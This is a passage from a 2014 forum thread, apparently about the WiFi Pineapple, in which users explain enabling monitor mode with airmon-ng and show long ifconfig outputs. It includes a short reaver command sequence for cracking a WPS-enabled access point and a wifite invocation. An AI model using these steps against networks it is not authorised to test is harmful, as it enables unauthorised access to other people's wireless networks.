(1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1194 errors:0 dropped:0 overruns:0 frame:0 TX packets:24257 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:108426 (105.8 KiB) TX bytes:1091196 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32114 errors:0 dropped:0 overruns:0 frame:0 TX packets:32114 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2485571 (2.3 MiB) TX bytes:2485571 (2.3 MiB) Now here is what it looks like after running airmon-ng start wlan1: root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# Note the "(monitor mode enabled on mon0)" and also notice that wlan0 wasn't in any of the ifconfigs but it is still in here (but we are ignoring it because wlan1/mon0 is what were after). Now ifconfig again: root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1272 errors:0 dropped:0 overruns:0 frame:0 TX packets:24378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:96714 (94.4 KiB) TX bytes:1099694 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1275 errors:0 dropped:0 overruns:0 frame:0 TX packets:24381 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:115548 (112.8 KiB) TX bytes:1100900 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32224 errors:0 dropped:0 overruns:0 frame:0 TX packets:32224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2494087 (2.3 MiB) TX bytes:2494087 (2.3 MiB) mon0 Link encap:UNSPEC HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) root@Pineapple:~# We now have mon0. See the Mac address embedded in the HWaddr? Edited May 16, 2014 by SlimPickens Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 16, 2014 Share Posted May 16, 2014 (edited) airmon-ng stop wlan1 Or reboot if you're lazy. :) Thanks. that stops wlan1 but That doesn't reset the mon to start back at mon0 when restarting. I found it.. just type airmon-ng stop mon1 for each mon that you want to stop. The reason Im doing this is because im writting a SIMPLE script and have it reference mon0. Edited May 16, 2014 by WilsonB Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 16, 2014 Share Posted May 16, 2014 You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, its just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking. Thats why airmon-ng warns you about all those pids, one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver. So if you want to use wlan2 for cracking, you want to: ifconfig wlan2 down airmon-ng start wlan2 (look for what mon interface number to use in the response) reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel* But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware. You can check your work by running just ifconfig and looking at the interfaces. root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1127 errors:0 dropped:0 overruns:0 frame:0 TX packets:24175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:86006 (83.9 KiB) TX bytes:1082632 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1130 errors:0 dropped:0 overruns:0 frame:0 TX packets:24178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:102810 (100.4 KiB) TX bytes:1083838 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32058 errors:0 dropped:0 overruns:0 frame:0 TX packets:32058 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2481231 (2.3 MiB) TX bytes:2481231 (2.3 MiB) wlan1 Link encap:Ethernet HWaddr 00:13:37:93:58:09 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) See wlan1 is listed? Note the MAC address. 00:13:37:93:58:09 now after ifconfig wlan1 down: root@Pineapple:~# ifconfig wlan1 down root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1191 errors:0 dropped:0 overruns:0 frame:0 TX packets:24254 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:90726 (88.5 KiB) TX bytes:1089990 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1194 errors:0 dropped:0 overruns:0 frame:0 TX packets:24257 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:108426 (105.8 KiB) TX bytes:1091196 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32114 errors:0 dropped:0 overruns:0 frame:0 TX packets:32114 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2485571 (2.3 MiB) TX bytes:2485571 (2.3 MiB) Now here is what it looks like after running airmon-ng start wlan1: root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# Note the "(monitor mode enabled on mon0)" and also notice that wlan0 wasn't in any of the ifconfigs but it is still in here (but we are ignoring it because wlan1/mon0 is what were after). Now ifconfig again: root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1272 errors:0 dropped:0 overruns:0 frame:0 TX packets:24378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:96714 (94.4 KiB) TX bytes:1099694 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1275 errors:0 dropped:0 overruns:0 frame:0 TX packets:24381 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:115548 (112.8 KiB) TX bytes:1100900 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32224 errors:0 dropped:0 overruns:0 frame:0 TX packets:32224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2494087 (2.3 MiB) TX bytes:2494087 (2.3 MiB) mon0 Link encap:UNSPEC HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) root@Pineapple:~# We now have mon0. See the Mac address embedded in the HWaddr? Understand.. Thanks for all your help. You explain things well and appreciate it. Things are coming together, Wifite seems to work pretty good to if using the no timeout option ./wifite.py -wpst 0 Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 16, 2014 Share Posted May 16, 2014 Thats ok, I understand. If i do ifconfig wlan2 down and start monitoring, ehat to do with wlan0 and wlan1? Do i need to enable them or disable, or down or up? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.